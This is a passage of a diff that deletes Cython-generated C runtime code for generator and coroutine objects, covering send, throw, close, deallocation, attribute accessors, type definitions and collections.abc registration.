Py_CLEAR(result); - } - return result; -#endif -} -#endif -static CYTHON_INLINE -PyObject *__Pyx_Coroutine_FinishDelegation(__pyx_CoroutineObject *gen) { - PyObject *ret; - PyObject *val = NULL; - __Pyx_Coroutine_Undelegate(gen); - __Pyx_PyGen__FetchStopIterationValue(__Pyx_PyThreadState_Current, &val); - ret = __Pyx_Coroutine_SendEx(gen, val, 0); - Py_XDECREF(val); - return ret; -} -static PyObject *__Pyx_Coroutine_Send(PyObject *self, PyObject *value) { - PyObject *retval; - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject*) self; - PyObject *yf = gen->yieldfrom; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - PyObject *ret; - gen->is_running = 1; - #ifdef __Pyx_Generator_USED - if (__Pyx_Generator_CheckExact(yf)) { - ret = __Pyx_Coroutine_Send(yf, value); - } else - #endif - #ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(yf)) { - ret = __Pyx_Coroutine_Send(yf, value); - } else - #endif - #ifdef __Pyx_AsyncGen_USED - if (__pyx_PyAsyncGenASend_CheckExact(yf)) { - ret = __Pyx_async_gen_asend_send(yf, value); - } else - #endif - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) - if (PyGen_CheckExact(yf)) { - ret = __Pyx_PyGen_Send((PyGenObject*)yf, value == Py_None ? NULL : value); - } else - #endif - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03050000 && defined(PyCoro_CheckExact) && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) - if (PyCoro_CheckExact(yf)) { - ret = __Pyx_PyGen_Send((PyGenObject*)yf, value == Py_None ? NULL : value); - } else - #endif - { - if (value == Py_None) - ret = __Pyx_PyObject_GetIterNextFunc(yf)(yf); - else - ret = __Pyx_PyObject_CallMethod1(yf, __pyx_n_s_send, value); - } - gen->is_running = 0; - if (likely(ret)) { - return ret; - } - retval = __Pyx_Coroutine_FinishDelegation(gen); - } else { - retval = __Pyx_Coroutine_SendEx(gen, value, 0); - } - return __Pyx_Coroutine_MethodReturn(self, retval); -} -static int __Pyx_Coroutine_CloseIter(__pyx_CoroutineObject *gen, PyObject *yf) { - PyObject *retval = NULL; - int err = 0; - #ifdef __Pyx_Generator_USED - if (__Pyx_Generator_CheckExact(yf)) { - retval = __Pyx_Coroutine_Close(yf); - if (!retval) - return -1; - } else - #endif - #ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(yf)) { - retval = __Pyx_Coroutine_Close(yf); - if (!retval) - return -1; - } else - if (__Pyx_CoroutineAwait_CheckExact(yf)) { - retval = __Pyx_CoroutineAwait_Close((__pyx_CoroutineAwaitObject*)yf, NULL); - if (!retval) - return -1; - } else - #endif - #ifdef __Pyx_AsyncGen_USED - if (__pyx_PyAsyncGenASend_CheckExact(yf)) { - retval = __Pyx_async_gen_asend_close(yf, NULL); - } else - if (__pyx_PyAsyncGenAThrow_CheckExact(yf)) { - retval = __Pyx_async_gen_athrow_close(yf, NULL); - } else - #endif - { - PyObject *meth; - gen->is_running = 1; - meth = __Pyx_PyObject_GetAttrStrNoError(yf, __pyx_n_s_close); - if (unlikely(!meth)) { - if (unlikely(PyErr_Occurred())) { - PyErr_WriteUnraisable(yf); - } - } else { - retval = __Pyx_PyObject_CallNoArg(meth); - Py_DECREF(meth); - if (unlikely(!retval)) - err = -1; - } - gen->is_running = 0; - } - Py_XDECREF(retval); - return err; -} -static PyObject *__Pyx_Generator_Next(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject*) self; - PyObject *yf = gen->yieldfrom; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - PyObject *ret; - gen->is_running = 1; - #ifdef __Pyx_Generator_USED - if (__Pyx_Generator_CheckExact(yf)) { - ret = __Pyx_Generator_Next(yf); - } else - #endif - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) - if (PyGen_CheckExact(yf)) { - ret = __Pyx_PyGen_Send((PyGenObject*)yf, NULL); - } else - #endif - #ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(yf)) { - ret = __Pyx_Coroutine_Send(yf, Py_None); - } else - #endif - ret = __Pyx_PyObject_GetIterNextFunc(yf)(yf); - gen->is_running = 0; - if (likely(ret)) { - return ret; - } - return __Pyx_Coroutine_FinishDelegation(gen); - } - return __Pyx_Coroutine_SendEx(gen, Py_None, 0); -} -static PyObject *__Pyx_Coroutine_Close_Method(PyObject *self, PyObject *arg) { - CYTHON_UNUSED_VAR(arg); - return __Pyx_Coroutine_Close(self); -} -static PyObject *__Pyx_Coroutine_Close(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - PyObject *retval, *raised_exception; - PyObject *yf = gen->yieldfrom; - int err = 0; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - Py_INCREF(yf); - err = __Pyx_Coroutine_CloseIter(gen, yf); - __Pyx_Coroutine_Undelegate(gen); - Py_DECREF(yf); - } - if (err == 0) - PyErr_SetNone(PyExc_GeneratorExit); - retval = __Pyx_Coroutine_SendEx(gen, NULL, 1); - if (unlikely(retval)) { - const char *msg; - Py_DECREF(retval); - if ((0)) { - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_Coroutine_Check(self)) { - msg = "coroutine ignored GeneratorExit"; - #endif - #ifdef __Pyx_AsyncGen_USED - } else if (__Pyx_AsyncGen_CheckExact(self)) { -#if PY_VERSION_HEX < 0x03060000 - msg = "async generator ignored GeneratorExit - might require Python 3.6+ finalisation (PEP 525)"; -#else - msg = "async generator ignored GeneratorExit"; -#endif - #endif - } else { - msg = "generator ignored GeneratorExit"; - } - PyErr_SetString(PyExc_RuntimeError, msg); - return NULL; - } - raised_exception = PyErr_Occurred(); - if (likely(!raised_exception || __Pyx_PyErr_GivenExceptionMatches2(raised_exception, PyExc_GeneratorExit, PyExc_StopIteration))) { - if (raised_exception) PyErr_Clear(); - Py_INCREF(Py_None); - return Py_None; - } - return NULL; -} -static PyObject *__Pyx__Coroutine_Throw(PyObject *self, PyObject *typ, PyObject *val, PyObject *tb, - PyObject *args, int close_on_genexit) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - PyObject *yf = gen->yieldfrom; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - PyObject *ret; - Py_INCREF(yf); - if (__Pyx_PyErr_GivenExceptionMatches(typ, PyExc_GeneratorExit) && close_on_genexit) { - int err = __Pyx_Coroutine_CloseIter(gen, yf); - Py_DECREF(yf); - __Pyx_Coroutine_Undelegate(gen); - if (err < 0) - return __Pyx_Coroutine_MethodReturn(self, __Pyx_Coroutine_SendEx(gen, NULL, 0)); - goto throw_here; - } - gen->is_running = 1; - if (0 - #ifdef __Pyx_Generator_USED - || __Pyx_Generator_CheckExact(yf) - #endif - #ifdef __Pyx_Coroutine_USED - || __Pyx_Coroutine_Check(yf) - #endif - ) { - ret = __Pyx__Coroutine_Throw(yf, typ, val, tb, args, close_on_genexit); - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_CoroutineAwait_CheckExact(yf)) { - ret = __Pyx__Coroutine_Throw(((__pyx_CoroutineAwaitObject*)yf)->coroutine, typ, val, tb, args, close_on_genexit); - #endif - } else { - PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(yf, __pyx_n_s_throw); - if (unlikely(!meth)) { - Py_DECREF(yf); - if (unlikely(PyErr_Occurred())) { - gen->is_running = 0; - return NULL; - } - __Pyx_Coroutine_Undelegate(gen); - gen->is_running = 0; - goto throw_here; - } - if (likely(args)) { - ret = __Pyx_PyObject_Call(meth, args, NULL); - } else { - PyObject *cargs[4] = {NULL, typ, val, tb}; - ret = __Pyx_PyObject_FastCall(meth, cargs+1, 3 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); - } - Py_DECREF(meth); - } - gen->is_running = 0; - Py_DECREF(yf); - if (!ret) { - ret = __Pyx_Coroutine_FinishDelegation(gen); - } - return __Pyx_Coroutine_MethodReturn(self, ret); - } -throw_here: - __Pyx_Raise(typ, val, tb, NULL); - return __Pyx_Coroutine_MethodReturn(self, __Pyx_Coroutine_SendEx(gen, NULL, 0)); -} -static PyObject *__Pyx_Coroutine_Throw(PyObject *self, PyObject *args) { - PyObject *typ; - PyObject *val = NULL; - PyObject *tb = NULL; - if (unlikely(!PyArg_UnpackTuple(args, (char *)"throw", 1, 3, &typ, &val, &tb))) - return NULL; - return __Pyx__Coroutine_Throw(self, typ, val, tb, args, 1); -} -static CYTHON_INLINE int __Pyx_Coroutine_traverse_excstate(__Pyx_ExcInfoStruct *exc_state, visitproc visit, void *arg) { -#if PY_VERSION_HEX >= 0x030B00a4 - Py_VISIT(exc_state->exc_value); -#else - Py_VISIT(exc_state->exc_type); - Py_VISIT(exc_state->exc_value); - Py_VISIT(exc_state->exc_traceback); -#endif - return 0; -} -static int __Pyx_Coroutine_traverse(__pyx_CoroutineObject *gen, visitproc visit, void *arg) { - Py_VISIT(gen->closure); - Py_VISIT(gen->classobj); - Py_VISIT(gen->yieldfrom); - return __Pyx_Coroutine_traverse_excstate(&gen->gi_exc_state, visit, arg); -} -static int __Pyx_Coroutine_clear(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - Py_CLEAR(gen->closure); - Py_CLEAR(gen->classobj); - Py_CLEAR(gen->yieldfrom); - __Pyx_Coroutine_ExceptionClear(&gen->gi_exc_state); -#ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(self)) { - Py_CLEAR(((__pyx_PyAsyncGenObject*)gen)->ag_finalizer); - } -#endif - Py_CLEAR(gen->gi_code); - Py_CLEAR(gen->gi_frame); - Py_CLEAR(gen->gi_name); - Py_CLEAR(gen->gi_qualname); - Py_CLEAR(gen->gi_modulename); - return 0; -} -static void __Pyx_Coroutine_dealloc(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - PyObject_GC_UnTrack(gen); - if (gen->gi_weakreflist != NULL) - PyObject_ClearWeakRefs(self); - if (gen->resume_label >= 0) { - PyObject_GC_Track(self); -#if PY_VERSION_HEX >= 0x030400a1 && CYTHON_USE_TP_FINALIZE - if (unlikely(PyObject_CallFinalizerFromDealloc(self))) -#else - Py_TYPE(gen)->tp_del(self); - if (unlikely(Py_REFCNT(self) > 0)) -#endif - { - return; - } - PyObject_GC_UnTrack(self); - } -#ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(self)) { - /* We have to handle this case for asynchronous generators - right here, because this code has to be between UNTRACK - and GC_Del. */ - Py_CLEAR(((__pyx_PyAsyncGenObject*)self)->ag_finalizer); - } -#endif - __Pyx_Coroutine_clear(self); - __Pyx_PyHeapTypeObject_GC_Del(gen); -} -static void __Pyx_Coroutine_del(PyObject *self) { - PyObject *error_type, *error_value, *error_traceback; - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - __Pyx_PyThreadState_declare - if (gen->resume_label < 0) { - return; - } -#if !CYTHON_USE_TP_FINALIZE - assert(self->ob_refcnt == 0); - __Pyx_SET_REFCNT(self, 1); -#endif - __Pyx_PyThreadState_assign - __Pyx_ErrFetch(&error_type, &error_value, &error_traceback); -#ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(self)) { - __pyx_PyAsyncGenObject *agen = (__pyx_PyAsyncGenObject*)self; - PyObject *finalizer = agen->ag_finalizer; - if (finalizer && !agen->ag_closed) { - PyObject *res = __Pyx_PyObject_CallOneArg(finalizer, self); - if (unlikely(!res)) { - PyErr_WriteUnraisable(self); - } else { - Py_DECREF(res); - } - __Pyx_ErrRestore(error_type, error_value, error_traceback); - return; - } - } -#endif - if (unlikely(gen->resume_label == 0 && !error_value)) { -#ifdef __Pyx_Coroutine_USED -#ifdef __Pyx_Generator_USED - if (!__Pyx_Generator_CheckExact(self)) -#endif - { - PyObject_GC_UnTrack(self); -#if PY_MAJOR_VERSION >= 3 || defined(PyErr_WarnFormat) - if (unlikely(PyErr_WarnFormat(PyExc_RuntimeWarning, 1, "coroutine '%.50S' was never awaited", gen->gi_qualname) < 0)) - PyErr_WriteUnraisable(self); -#else - {PyObject *msg; - char *cmsg; - #if CYTHON_COMPILING_IN_PYPY - msg = NULL; - cmsg = (char*) "coroutine was never awaited"; - #else - char *cname; - PyObject *qualname; - qualname = gen->gi_qualname; - cname = PyString_AS_STRING(qualname); - msg = PyString_FromFormat("coroutine '%.50s' was never awaited", cname); - if (unlikely(!msg)) { - PyErr_Clear(); - cmsg = (char*) "coroutine was never awaited"; - } else { - cmsg = PyString_AS_STRING(msg); - } - #endif - if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, cmsg, 1) < 0)) - PyErr_WriteUnraisable(self); - Py_XDECREF(msg);} -#endif - PyObject_GC_Track(self); - } -#endif - } else { - PyObject *res = __Pyx_Coroutine_Close(self); - if (unlikely(!res)) { - if (PyErr_Occurred()) - PyErr_WriteUnraisable(self); - } else { - Py_DECREF(res); - } - } - __Pyx_ErrRestore(error_type, error_value, error_traceback); -#if !CYTHON_USE_TP_FINALIZE - assert(Py_REFCNT(self) > 0); - if (likely(--self->ob_refcnt == 0)) { - return; - } - { - Py_ssize_t refcnt = Py_REFCNT(self); - _Py_NewReference(self); - __Pyx_SET_REFCNT(self, refcnt); - } -#if CYTHON_COMPILING_IN_CPYTHON - assert(PyType_IS_GC(Py_TYPE(self)) && - _Py_AS_GC(self)->gc.gc_refs != _PyGC_REFS_UNTRACKED); - _Py_DEC_REFTOTAL; -#endif -#ifdef COUNT_ALLOCS - --Py_TYPE(self)->tp_frees; - --Py_TYPE(self)->tp_allocs; -#endif -#endif -} -static PyObject * -__Pyx_Coroutine_get_name(__pyx_CoroutineObject *self, void *context) -{ - PyObject *name = self->gi_name; - CYTHON_UNUSED_VAR(context); - if (unlikely(!name)) name = Py_None; - Py_INCREF(name); - return name; -} -static int -__Pyx_Coroutine_set_name(__pyx_CoroutineObject *self, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__name__ must be set to a string object"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(self->gi_name, value); - return 0; -} -static PyObject * -__Pyx_Coroutine_get_qualname(__pyx_CoroutineObject *self, void *context) -{ - PyObject *name = self->gi_qualname; - CYTHON_UNUSED_VAR(context); - if (unlikely(!name)) name = Py_None; - Py_INCREF(name); - return name; -} -static int -__Pyx_Coroutine_set_qualname(__pyx_CoroutineObject *self, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__qualname__ must be set to a string object"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(self->gi_qualname, value); - return 0; -} -static PyObject * -__Pyx_Coroutine_get_frame(__pyx_CoroutineObject *self, void *context) -{ - PyObject *frame = self->gi_frame; - CYTHON_UNUSED_VAR(context); - if (!frame) { - if (unlikely(!self->gi_code)) { - Py_RETURN_NONE; - } - frame = (PyObject *) PyFrame_New( - PyThreadState_Get(), /*PyThreadState *tstate,*/ - (PyCodeObject*) self->gi_code, /*PyCodeObject *code,*/ - __pyx_d, /*PyObject *globals,*/ - 0 /*PyObject *locals*/ - ); - if (unlikely(!frame)) - return NULL; - self->gi_frame = frame; - } - Py_INCREF(frame); - return frame; -} -static __pyx_CoroutineObject *__Pyx__Coroutine_New( - PyTypeObject* type, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name) { - __pyx_CoroutineObject *gen = PyObject_GC_New(__pyx_CoroutineObject, type); - if (unlikely(!gen)) - return NULL; - return __Pyx__Coroutine_NewInit(gen, body, code, closure, name, qualname, module_name); -} -static __pyx_CoroutineObject *__Pyx__Coroutine_NewInit( - __pyx_CoroutineObject *gen, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name) { - gen->body = body; - gen->closure = closure; - Py_XINCREF(closure); - gen->is_running = 0; - gen->resume_label = 0; - gen->classobj = NULL; - gen->yieldfrom = NULL; - #if PY_VERSION_HEX >= 0x030B00a4 - gen->gi_exc_state.exc_value = NULL; - #else - gen->gi_exc_state.exc_type = NULL; - gen->gi_exc_state.exc_value = NULL; - gen->gi_exc_state.exc_traceback = NULL; - #endif -#if CYTHON_USE_EXC_INFO_STACK - gen->gi_exc_state.previous_item = NULL; -#endif - gen->gi_weakreflist = NULL; - Py_XINCREF(qualname); - gen->gi_qualname = qualname; - Py_XINCREF(name); - gen->gi_name = name; - Py_XINCREF(module_name); - gen->gi_modulename = module_name; - Py_XINCREF(code); - gen->gi_code = code; - gen->gi_frame = NULL; - PyObject_GC_Track(gen); - return gen; -} - -/* PyObject_GenericGetAttrNoDict */ -#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 -static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { - __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); - PyErr_Format(PyExc_AttributeError, -#if PY_MAJOR_VERSION >= 3 - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", - type_name, attr_name); -#else - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", - type_name, PyString_AS_STRING(attr_name)); -#endif - __Pyx_DECREF_TypeName(type_name); - return NULL; -} -static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { - PyObject *descr; - PyTypeObject *tp = Py_TYPE(obj); - if (unlikely(!PyString_Check(attr_name))) { - return PyObject_GenericGetAttr(obj, attr_name); - } - assert(!tp->tp_dictoffset); - descr = _PyType_Lookup(tp, attr_name); - if (unlikely(!descr)) { - return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); - } - Py_INCREF(descr); - #if PY_MAJOR_VERSION < 3 - if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) - #endif - { - descrgetfunc f = Py_TYPE(descr)->tp_descr_get; - if (unlikely(f)) { - PyObject *res = f(descr, obj, (PyObject *)tp); - Py_DECREF(descr); - return res; - } - } - return descr; -} -#endif - -/* PatchModuleWithCoroutine */ -static PyObject* __Pyx_Coroutine_patch_module(PyObject* module, const char* py_code) { -#if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) - int result; - PyObject *globals, *result_obj; - globals = PyDict_New(); if (unlikely(!globals)) goto ignore; - result = PyDict_SetItemString(globals, "_cython_coroutine_type", - #ifdef __Pyx_Coroutine_USED - (PyObject*)__pyx_CoroutineType); - #else - Py_None); - #endif - if (unlikely(result < 0)) goto ignore; - result = PyDict_SetItemString(globals, "_cython_generator_type", - #ifdef __Pyx_Generator_USED - (PyObject*)__pyx_GeneratorType); - #else - Py_None); - #endif - if (unlikely(result < 0)) goto ignore; - if (unlikely(PyDict_SetItemString(globals, "_module", module) < 0)) goto ignore; - if (unlikely(PyDict_SetItemString(globals, "__builtins__", __pyx_b) < 0)) goto ignore; - result_obj = PyRun_String(py_code, Py_file_input, globals, globals); - if (unlikely(!result_obj)) goto ignore; - Py_DECREF(result_obj); - Py_DECREF(globals); - return module; -ignore: - Py_XDECREF(globals); - PyErr_WriteUnraisable(module); - if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, "Cython module failed to patch module with custom type", 1) < 0)) { - Py_DECREF(module); - module = NULL; - } -#else - py_code++; -#endif - return module; -} - -/* PatchGeneratorABC */ -#ifndef CYTHON_REGISTER_ABCS -#define CYTHON_REGISTER_ABCS 1 -#endif -#if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) -static PyObject* __Pyx_patch_abc_module(PyObject *module); -static PyObject* __Pyx_patch_abc_module(PyObject *module) { - module = __Pyx_Coroutine_patch_module( - module, "" -"if _cython_generator_type is not None:\n" -" try: Generator = _module.Generator\n" -" except AttributeError: pass\n" -" else: Generator.register(_cython_generator_type)\n" -"if _cython_coroutine_type is not None:\n" -" try: Coroutine = _module.Coroutine\n" -" except AttributeError: pass\n" -" else: Coroutine.register(_cython_coroutine_type)\n" - ); - return module; -} -#endif -static int __Pyx_patch_abc(void) { -#if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) - static int abc_patched = 0; - if (CYTHON_REGISTER_ABCS && !abc_patched) { - PyObject *module; - module = PyImport_ImportModule((PY_MAJOR_VERSION >= 3) ? "collections.abc" : "collections"); - if (unlikely(!module)) { - PyErr_WriteUnraisable(NULL); - if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, - ((PY_MAJOR_VERSION >= 3) ? - "Cython module failed to register with collections.abc module" : - "Cython module failed to register with collections module"), 1) < 0)) { - return -1; - } - } else { - module = __Pyx_patch_abc_module(module); - abc_patched = 1; - if (unlikely(!module)) - return -1; - Py_DECREF(module); - } - module = PyImport_ImportModule("backports_abc"); - if (module) { - module = __Pyx_patch_abc_module(module); - Py_XDECREF(module); - } - if (!module) { - PyErr_Clear(); - } - } -#else - if ((0)) __Pyx_Coroutine_patch_module(NULL, NULL); -#endif - return 0; -} - -/* Generator */ -static PyMethodDef __pyx_Generator_methods[] = { - {"send", (PyCFunction) __Pyx_Coroutine_Send, METH_O, - (char*) PyDoc_STR("send(arg) -> send 'arg' into generator,\nreturn next yielded value or raise StopIteration.")}, - {"throw", (PyCFunction) __Pyx_Coroutine_Throw, METH_VARARGS, - (char*) PyDoc_STR("throw(typ[,val[,tb]]) -> raise exception in generator,\nreturn next yielded value or raise StopIteration.")}, - {"close", (PyCFunction) __Pyx_Coroutine_Close_Method, METH_NOARGS, - (char*) PyDoc_STR("close() -> raise GeneratorExit inside generator.")}, - {0, 0, 0, 0} -}; -static PyMemberDef __pyx_Generator_memberlist[] = { - {(char *) "gi_running", T_BOOL, offsetof(__pyx_CoroutineObject, is_running), READONLY, NULL}, - {(char*) "gi_yieldfrom", T_OBJECT, offsetof(__pyx_CoroutineObject, yieldfrom), READONLY, - (char*) PyDoc_STR("object being iterated by 'yield from', or None")}, - {(char*) "gi_code", T_OBJECT, offsetof(__pyx_CoroutineObject, gi_code), READONLY, NULL}, - {(char *) "__module__", T_OBJECT, offsetof(__pyx_CoroutineObject, gi_modulename), 0, 0}, -#if CYTHON_USE_TYPE_SPECS - {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CoroutineObject, gi_weakreflist), READONLY, 0}, -#endif - {0, 0, 0, 0, 0} -}; -static PyGetSetDef __pyx_Generator_getsets[] = { - {(char *) "__name__", (getter)__Pyx_Coroutine_get_name, (setter)__Pyx_Coroutine_set_name, - (char*) PyDoc_STR("name of the generator"), 0}, - {(char *) "__qualname__", (getter)__Pyx_Coroutine_get_qualname, (setter)__Pyx_Coroutine_set_qualname, - (char*) PyDoc_STR("qualified name of the generator"), 0}, - {(char *) "gi_frame", (getter)__Pyx_Coroutine_get_frame, NULL, - (char*) PyDoc_STR("Frame of the generator"), 0}, - {0, 0, 0, 0, 0} -}; -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_GeneratorType_slots[] = { - {Py_tp_dealloc, (void *)__Pyx_Coroutine_dealloc}, - {Py_tp_traverse, (void *)__Pyx_Coroutine_traverse}, - {Py_tp_iter, (void *)PyObject_SelfIter}, - {Py_tp_iternext, (void *)__Pyx_Generator_Next}, - {Py_tp_methods, (void *)__pyx_Generator_methods}, - {Py_tp_members, (void *)__pyx_Generator_memberlist}, - {Py_tp_getset, (void *)__pyx_Generator_getsets}, - {Py_tp_getattro, (void *) __Pyx_PyObject_GenericGetAttrNoDict}, -#if CYTHON_USE_TP_FINALIZE - {Py_tp_finalize, (void *)__Pyx_Coroutine_del}, -#endif - {0, 0}, -}; -static PyType_Spec __pyx_GeneratorType_spec = { - __PYX_TYPE_MODULE_PREFIX "generator", - sizeof(__pyx_CoroutineObject), - 0, - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_HAVE_FINALIZE, - __pyx_GeneratorType_slots -}; -#else -static PyTypeObject __pyx_GeneratorType_type = { - PyVarObject_HEAD_INIT(0, 0) - __PYX_TYPE_MODULE_PREFIX "generator", - sizeof(__pyx_CoroutineObject), - 0, - (destructor) __Pyx_Coroutine_dealloc, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_HAVE_FINALIZE, - 0, - (traverseproc) __Pyx_Coroutine_traverse, - 0, - 0, - offsetof(__pyx_CoroutineObject, gi_weakreflist), - 0, - (iternextfunc) __Pyx_Generator_Next, - __pyx_Generator_methods, - __pyx_Generator_memberlist, - __pyx_Generator_getsets, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, -#if CYTHON_USE_TP_FINALIZE - 0, -#else - __Pyx_Coroutine_del, -#endif - 0, -#if CYTHON_USE_TP_FINALIZE - __Pyx_Coroutine_del, -#elif PY_VERSION_HEX >= 0x030400a1 - 0, -#endif -#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, -#endif -#if __PYX_NEED_TP_PRINT_SLOT - 0, -#endif -#if PY_VERSION_HEX >= 0x030C0000 - 0, -#endif -#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, -#endif -}; -#endif -static int __pyx_Generator_init(PyObject *module) { -#if CYTHON_USE_TYPE_SPECS - __pyx_GeneratorType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_GeneratorType_spec, NULL); -#else - CYTHON_UNUSED_VAR(module); - __pyx_GeneratorType_type.tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - __pyx_GeneratorType_type.tp_iter = PyObject_SelfIter; - __pyx_GeneratorType = __Pyx_FetchCommonType(&__pyx_GeneratorType_type); -#endif - if (unlikely(!__pyx_GeneratorType)) { - return -1; - } - return 0; -} - -/* GeneratorYieldFrom */ -#if CYTHON_USE_TYPE_SLOTS -static void __Pyx_PyIter_CheckErrorAndDecref(PyObject *source) { - __Pyx_TypeName source_type_name = __Pyx_PyType_GetName(Py_TYPE(source)); - PyErr_Format(PyExc_TypeError, - "iter() returned non-iterator of type '" __Pyx_FMT_TYPENAME "'", source_type_name); - __Pyx_DECREF_TypeName(source_type_name); - Py_DECREF(source); -} -#endif -static CYTHON_INLINE PyObject* __Pyx_Generator_Yield_From(__pyx_CoroutineObject *gen, PyObject *source) { - PyObject *source_gen, *retval; -#ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(source)) { - Py_INCREF(source); - source_gen = source; - retval = __Pyx_Generator_Next(source); - } else -#endif - { -#if CYTHON_USE_TYPE_SLOTS - if (likely(Py_TYPE(source)->tp_iter)) { - source_gen = Py_TYPE(source)->tp_iter(source); - if (unlikely(!source_gen)) - return NULL; - if (unlikely(!PyIter_Check(source_gen))) { - __Pyx_PyIter_CheckErrorAndDecref(source_gen); - return NULL; - } - } else -#endif - { - source_gen = PyObject_GetIter(source); - if (unlikely(!source_gen)) - return NULL; - } - retval = __Pyx_PyObject_GetIterNextFunc(source_gen)(source_gen); - } - if (likely(retval)) { - gen->yieldfrom = source_gen; - return retval; - } - Py_DECREF(source_gen); - return NULL; -} - -/* append */ -static CYTHON_INLINE int __Pyx_PyObject_Append(PyObject* L, PyObject* x) { - if (likely(PyList_CheckExact(L))) { - if (unlikely(__Pyx_PyList_Append(L, x) < 0)) return -1; - } else { - PyObject* retval = __Pyx_PyObject_CallMethod1(L, __pyx_n_s_append, x); - if (unlikely(!retval)) - return -1; - Py_DECREF(retval); - } - return 0; -} - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long x; - long a = PyInt_AS_LONG(op1); - - x = (long)((unsigned long)a + (unsigned long)b); - if (likely((x^a) >= 0 || (x^b) >= 0)) - return PyInt_FromLong(x); - return PyLong_Type.tp_as_number->nb_add(op1, op2); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - const long b = intval; - long a, x; -#ifdef HAVE_LONG_LONG - const PY_LONG_LONG llb = intval; - PY_LONG_LONG lla, llx; -#endif - if (unlikely(__Pyx_PyLong_IsZero(op1))) { - return __Pyx_NewRef(op2); - } - if (likely(__Pyx_PyLong_IsCompact(op1))) { - a = 